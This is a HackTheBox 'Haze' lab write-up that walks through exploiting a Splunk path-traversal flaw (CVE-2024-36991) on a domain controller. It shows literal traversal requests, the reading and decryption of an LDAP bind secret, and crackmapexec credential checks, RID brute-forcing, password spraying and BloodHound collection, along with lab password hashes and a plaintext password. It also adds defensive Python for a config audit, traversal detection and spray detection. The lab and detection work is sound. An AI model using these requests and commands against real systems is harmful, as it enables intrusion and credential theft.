🧠 HTB Write-Up: Haze
Difficulty: Hard
OS: Linux
Points: 30
Date: 2025-04-07
🔍 Reconnaissance
🔎 Nmap Scan Results
Command Used:
nmap -sV -sC 10.129.232.42 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-07 20:50:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
8000/tcp open http Splunkd httpd
|_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://dc01.haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: 404 Not Found
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
8089/tcp open ssl/http Splunkd httpd
|_http-title: splunkd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-07T20:51:00
|_ start_date: N/A
Target Host: 10.129.232.42 (dc01.haze.htb)
Host OS: Likely Windows Server (Domain Controller)
🟢 Open Ports and Services:

| Port | Service | Version / Notes |
|---|---|---|
| 53 | DNS | Simple DNS Plus |
| 88 | Kerberos-sec | Microsoft Windows Kerberos |
| 135 | MSRPC | Remote Procedure Call |
| 139 | NetBIOS-SSN | SMB legacy support |
| 389 | LDAP | AD LDAP (Domain: haze.htb) |
| 445 | Microsoft-DS | SMB - Likely Active Directory |
| 464 | kpasswd5? | Kerberos Password Change |
| 593 | ncacn_http | RPC over HTTP |
| 636 | LDAPS | Secure LDAP (AD) |
| 3268 | LDAP GC | AD Global Catalog |
| 3269 | LDAPS GC | Secure Global Catalog |
| 8000 | HTTP | Splunk Web Interface (login page) |
| 8088 | HTTPS | Splunkd (API endpoint) |
| 8089 | HTTPS | Splunkd (Mgmt/Service endpoint) |
🧠 Observations:
- This host is a Windows Active Directory Domain Controller (dc01.haze.htb)
- Multiple LDAP/Kerberos services confirm an AD environment
- Splunk appears to be running on ports 8000, 8088, and 8089
- Identified Splunk Version 9.2.1 via port 8089: https://i.imgur.com/Ynqo6Fr.png
🌐 Enumeration
🔹 Interface Access
- Navigated to: http://haze.htb:8000 → Splunk Web Login Page
- Splunk Management available on: https://haze.htb:8088 and https://haze.htb:8089
⚠️ Vulnerability Identified
- CVE-2024-36991 – Path Traversal in Splunk
- Affects versions < 9.2.2 (Windows)
- Exploitable via the /modules/messaging/ endpoint
- Allows arbitrary file read on the host
📸 PoC Search on GitHub:
🧪 Exploit Usage
python CVE-2024-36991.py -u http://haze.htb:8000/
[VLUN] Vulnerable: http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:[email protected]:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::[email protected]:user:[email protected]:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:[email protected]:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:[email protected]:::20152
👥 Extracted Usernames (from Splunk config)
From the Splunk path traversal exploit output above, the following potential user accounts were identified:
- admin (Administrator)
- edward
- mark
- paul
🛠️ Continued Exploitation – Splunk File Reads
Since the password hashes could not be cracked, the next logical step was to modify the CVE-2024-36991 exploit to read other sensitive files.
📄 Target: Splunk Configuration File
Goal: Identify Splunk’s installation path and pivot to read additional files.
Exploitation Path Used:
.../Program%20Files/Splunk/etc/splunk-launch.conf
📄 Read: splunk-launch.conf
File Content:
# Version 9.2.1
# Modify the following line to suit the location of your Splunk install.
# If unset, Splunk will use the parent of the directory containing the splunk CLI executable.
SPLUNK_HOME=C:\Program Files\Splunk
# By default, Splunk stores its indexes under SPLUNK_HOME in the var\lib\splunk subdirectory.
# This can be overridden here:
# SPLUNK_DB=C:\builds\splcore\main\build_home\splunk\var\lib\splunk
# Splunkd service name
SPLUNK_SERVER_NAME=Splunkd
PYTHONHTTPSVERIFY=0
PYTHONUTF8=1
📄 Read: authentication.conf
Request Used:
GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/system/local/authentication.conf HTTP/1.1
Host: dc01.haze.htb:8000
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
Key Findings:
- LDAP Auth Enabled (authType = LDAP)
- Bind DN: CN=Paul Taylor,CN=Users,DC=haze,DC=htb
- Encrypted bind password (bindDNpassword, stored in Splunk's $7$ format)
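The stanzas above are worth reading as a defender too: the splunk_auth policy accepts 8-character passwords with no complexity, and the LDAP strategy binds over port 389 with SSLEnabled = 0, so the bind credentials cross the wire in cleartext. The following audit script is an added example for this write-up, not code from the original post or from Splunk; it parses a constructed copy of the stanzas shown above (bind password redacted) with Python's configparser and reports the settings a reviewer would flag. The minimum policy values are an assumed hardening baseline, not Splunk defaults.

```python
"""Audit a Splunk authentication.conf for weak settings (added example)."""
import configparser
from typing import Dict, List

# Constructed copy of the stanzas shown in the write-up; secret redacted.
SAMPLE_CONF = """\
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$REDACTED
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
"""

# Assumed hardening baseline for the splunk_auth password policy.
POLICY_MINIMUMS: Dict[str, int] = {
    "minPasswordLength": 14,
    "minPasswordUppercase": 1,
    "minPasswordLowercase": 1,
    "minPasswordSpecial": 1,
    "minPasswordDigit": 1,
}


def parse_conf(text: str) -> configparser.ConfigParser:
    """Parse Splunk's INI-style conf text, keeping camelCase keys intact."""
    cp = configparser.ConfigParser(interpolation=None)  # '$7$' must not be interpolated
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit(text: str) -> List[str]:
    """Return one finding per weak setting found in the conf text."""
    cp = parse_conf(text)
    findings: List[str] = []

    if cp.has_section("splunk_auth"):
        for key, minimum in POLICY_MINIMUMS.items():
            value = cp["splunk_auth"].getint(key, fallback=0)
            if value < minimum:
                findings.append(f"splunk_auth: {key}={value} (expected >= {minimum})")

    # Any stanza that carries a bindDN is an LDAP authentication strategy.
    for name in cp.sections():
        sec = cp[name]
        if "bindDN" not in sec:
            continue
        if sec.get("SSLEnabled", "0") != "1":
            findings.append(
                f"{name}: SSLEnabled=0, bind credentials travel in cleartext "
                f"to {sec.get('host')}:{sec.get('port')}"
            )
        if sec.get("bindDNpassword", "").startswith("$7$"):
            findings.append(
                f"{name}: bindDNpassword is reversible by anyone who can read splunk.secret"
            )
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF):
        print(finding)
```

Run against the real file on a Splunk host the same way, replacing SAMPLE_CONF with the contents of etc/system/local/authentication.conf; the last finding is the one that matters most here, because the $7$ ciphertext and splunk.secret were both readable through the same traversal.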
📄 Read: splunk.secret
To decrypt the LDAP bind password (bindDNpassword), Splunk uses a master key stored in splunk.secret.
Request Used:
GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/auth/splunk.secret HTTP/1.1
Host: dc01.haze.htb:8000
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
📌 Tool Required to Decrypt: splunksecrets by HurricaneLabs
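Both file reads above use the same request shape: a path under /en-US/modules/messaging/ followed by repeated C%3A../ segments that escape the module directory. That shape is what a detection should key on. The script below is an added example for this write-up, not code from the original post or from Splunk: it runs over constructed access-log lines in a combined-log style (real Splunk web_access.log lines carry more fields, so REQUEST_RE would need adjusting), fully URL-decodes each request path so double-encoded variants are not missed, and flags requests to the vulnerable module whose decoded path contains a parent-directory step or a Windows drive prefix.

```python
"""Flag CVE-2024-36991-style traversal requests in web access logs (added example)."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines: two benign requests and two traversal attempts
# shaped like the requests shown in the write-up (one double-encoded).
SAMPLE_LOG = """\
10.10.14.5 - - [07/Apr/2025:20:52:01 +0000] "GET /en-US/account/login?return_to=%2Fen-US%2F HTTP/1.1" 200 4122
10.10.14.5 - - [07/Apr/2025:20:53:10 +0000] "GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/system/local/authentication.conf HTTP/1.1" 200 612
10.10.14.9 - - [07/Apr/2025:20:54:44 +0000] "GET /en-US/static/app/launcher/icon.png HTTP/1.1" 200 1024
10.10.14.5 - - [07/Apr/2025:20:55:02 +0000] "GET /en-US/modules/messaging/C%253A../C%253A../etc/auth/splunk.secret HTTP/1.1" 200 254
"""

# Combined-log shape assumed for the constructed lines above.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A parent-directory step, or a drive letter after a slash (the C:.. trick).
TRAVERSAL_RE = re.compile(r'\.\.[/\\]|(^|/)[A-Za-z]:')
VULNERABLE_MODULE = "/modules/messaging/"


def fully_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double encoding cannot hide the payload."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path: str) -> bool:
    """True when the request targets the vulnerable module with a traversal payload."""
    decoded = fully_decode(path.split("?", 1)[0])
    return VULNERABLE_MODULE in decoded and bool(TRAVERSAL_RE.search(decoded))


def find_traversals(log: str) -> List[Dict[str, str]]:
    """Return source, timestamp, raw path and status for every flagged request."""
    hits: List[Dict[str, str]] = []
    for line in log.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_traversal(m.group("path")):
            hits.append({k: m.group(k) for k in ("src", "ts", "path", "status")})
    return hits


if __name__ == "__main__":
    for hit in find_traversals(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['status']} {hit['path']}")
```

A 200 status on a flagged request is the signal that the read succeeded; pair this with patching to a fixed Splunk release, since the request itself is indistinguishable from legitimate module traffic except for the traversal payload.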
🔓 Decrypted LDAP Password – Paul Taylor
After retrieving both the encrypted password from authentication.conf and the splunk.secret master key, we successfully decrypted the LDAP credentials for Paul Taylor.
🔐 Ciphertext (from authentication.conf)
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
#### 🧰 Tool Used
- [`splunksecrets`](https://github.com/HurricaneLabs/splunksecrets)
#### 🧪 Command Executed
splunksecrets splunk-decrypt -S splunk.secret
✅ Decrypted Result
Ld@p_Auth_Sp1unk@2k24
🎯 Initial Foothold
Used crackmapexec to test the credentials against SMB on the domain controller.
Command:
crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.129.232.42 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
Confirmed: Credentials are valid for domain user paul.taylor
After confirming access with paul.taylor, we performed RID brute-force enumeration against the Domain Controller to enumerate valid users.
🧪 Command:
crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser'
500: HAZE\Administrator
501: HAZE\Guest
502: HAZE\krbtgt
1000: HAZE\DC01$
1103: HAZE\paul.taylor
1104: HAZE\mark.adams
1105: HAZE\edward.martin
1106: HAZE\alexander.green
1111: HAZE\Haze-IT-Backup$
You can see that there are several other domain users.
After identifying additional domain users via RID brute-force, we performed password spraying to test whether the recovered password was reused.
🧪 Command:
crackmapexec smb haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
Note: users.txt contains:
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
✅ Successful Login:
SMB 10.129.232.42 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
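The spray above leaves a distinctive trace on the domain controller: one source address producing failed logons (Event ID 4625) against several different accounts within seconds, followed by a successful logon (4624) for the account that shared the password. The detector below is an added example for this write-up, not code from the original post; the events are constructed dictionaries standing in for parsed 4625/4624 records rather than a real .evtx, and the five-minute window and three-account threshold are assumptions to tune for the environment.

```python
"""Detect password-spray patterns in failed-logon records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed 4625/4624-style records: one source sprays four accounts and
# lands on one of them; a second source only retries a single account.
EVENTS = [
    {"time": "2025-04-07T20:40:00", "event_id": 4625, "src": "10.10.14.9", "user": "paul.taylor"},
    {"time": "2025-04-07T20:41:00", "event_id": 4625, "src": "10.10.14.9", "user": "paul.taylor"},
    {"time": "2025-04-07T20:58:01", "event_id": 4625, "src": "10.10.14.5", "user": "edward.martin"},
    {"time": "2025-04-07T20:58:02", "event_id": 4625, "src": "10.10.14.5", "user": "alexander.green"},
    {"time": "2025-04-07T20:58:03", "event_id": 4625, "src": "10.10.14.5", "user": "Haze-IT-Backup$"},
    {"time": "2025-04-07T20:58:04", "event_id": 4624, "src": "10.10.14.5", "user": "mark.adams"},
]

SPRAY_WINDOW = timedelta(minutes=5)  # assumed detection window
SPRAY_MIN_USERS = 3                  # assumed distinct-account threshold


def detect_spray(events, window=SPRAY_WINDOW, min_users=SPRAY_MIN_USERS) -> Dict[str, dict]:
    """Return {source: summary} for sources that failed against >= min_users
    distinct accounts inside one window, plus any later success from that source."""
    failures: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    successes: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for e in events:
        stamp = datetime.fromisoformat(e["time"])
        if e["event_id"] == 4625:
            failures[e["src"]].append((stamp, e["user"]))
        elif e["event_id"] == 4624:
            successes[e["src"]].append((stamp, e["user"]))

    alerts: Dict[str, dict] = {}
    for src, attempts in failures.items():
        attempts.sort()
        # Slide a window over the source's failures, earliest start first.
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) < min_users:
                continue
            alerts[src] = {
                "window_start": start.isoformat(),
                "distinct_users": len(users),
                "accounts": sorted(users),
                # A success after the spray is the account the password matched.
                "success_after": sorted(u for t, u in successes.get(src, []) if t >= start),
            }
            break
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(EVENTS).items():
        print(src, info)
```

The single-account retries from the second source never reach the threshold, which is what keeps this rule from firing on ordinary mistyped passwords; the "success_after" field is the item to act on, since it names the account whose credential the spray confirmed.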
🕵️ Domain Recon – BloodHound Enumeration
After gaining valid domain credentials (mark.adams), we used BloodHound to enumerate Active Directory objects and relationships.
bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -dc dc01.haze.htb -ns 10.129.232.42 -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20250407173642_bloodhound.zip
🧠 Key Takeaways:
- Successfully retrieved data from the domain controller (dc01.haze.htb)
- Output saved as a ZIP file for analysis in the BloodHound GUI